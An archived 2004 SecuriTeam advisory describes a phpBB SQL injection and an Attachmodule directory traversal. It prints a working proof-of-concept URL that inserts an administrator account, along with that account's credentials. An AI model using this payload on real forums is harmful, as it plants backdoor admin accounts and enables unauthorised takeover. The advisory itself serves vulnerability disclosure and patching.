[UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal
From: SecuriTeam (support_at_securiteam.com)
Date: 11/29/04
- Previous message: SecuriTeam: "[UNIX] phpCMS Cross Site Scripting and Information Disclosure Issues"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 29 Nov 2004 10:54:57 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
phpBB SQL Injection and Attachmodule Add-On Directory Traversal
------------------------------------------------------------------------
SUMMARY
<http://www.phpbb.com/> phpBB is "a high powered, fully scalable, and
highly customizable open-source bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel,
and helpful FAQ. Based on the powerful PHP server language and your choice
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal free community solution for all web sites."
An SQL injection vulnerability and a directory traversal vulnerabilities
exist within phpBB and Attach module's code.
DETAILS
Vulnerable Systems:
* phpBB versions prior to 2.0.11
* Attachmodule, all versions
Immune Systems:
* phpBB version 2.0.11
Due to decoding mishandling of the input request a malicious attacker is
able to inject any type of SQL query to the back-end database server. Upon
close inspection of the code is became evident that using multiple char()
functions will fool phpBB and allow insertion of an SQL query.
The following SQL statement will add a user with administrative rights on
the system:
INSERT INTO phpbb_users(user_id, user_active, username, user_password,
user_level) VALUES ('99999', '1', 'ze3lock',
'ba3c83348bddf7b368b478ac06d3340e', '1')
And the following login credentials:
username: ze3lock
pass: thepass
Note: This query is assuming that the phpBB user table is called
'phpbb_users', which comprise most of the sites using phpBB. However,
sites in which the table's name was changed will not be affected and the
correct name of the table will have to be discovered before exploitation
can take place.
The exploit can be run on any site using phpBB without the need to be
registered. This makes it a prime target for automated scripts that insert
backdoors in many sites around the web. A proof of concept HTTP query is
provided below. In order to make it work, an active thread number from the
forums must be substituted in, but this is relatively trivial to find.
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)
%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)
%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)
%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)
%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)
%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)
%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)
%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)
%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)
%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)
%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)
%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)
%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)
%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527
In addition, a directory traversal bug in the Attachmodule allows the user
to read any file located on the local filesystem of the server running
phpBB. The main culprit is the 'UPLOAD_DIR' argument which is not properly
sanitized. This directory represents the directory in which all files
should be uploaded to and the system accepts any type of character as
input. An attacker is thus able to overwrite files on the local filesystem
of the server.
Vendor Status:
Users of this system are highly encouraged to upgade to version 2.0.11 and
add input validation to the 'UPLOAD_DIR' argument of Attachmodule.
ADDITIONAL INFORMATION
The information has been provided by <mailto:zee@psybnc.it> Zeelock.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] phpCMS Cross Site Scripting and Information Disclosure Issues"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] phpBB u Variable SQL Injection
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... phpBB is "a high
powered, fully scalable, and ... An SQL injection vulnerability exists in the uid field
sent to phpBB, ... (Securiteam) - [EXPL] phpBB Multiple User Registeration DoS (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... these users can be used to cause
a DoS against the phpBB product. ... int Connection; ... Write_In(sock, Path,
Pro_Sea, Host, x); ... (Securiteam) - [UNIX] PhpBB SQL Injection In Search Results Variable
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... phpBB is "a high
powered, fully scalable, and ... This bulletin is sent to members of the SecuriTeam mailing
list. ... (Securiteam) - [UNIX] phpBB Full Path Disclosure and XSS Vulnerability (category_rows, faq, ranksrow)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... phpBB is "a high powered,
fully scalable, and ... Fatal error: operator not supported for strings in ...
(Securiteam) - [NT] MyWeb Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... MyWeb is the ideal
tool for sharing photos, mp3s, as well as ... data will cause the HTTP server to crash.
... (Securiteam)
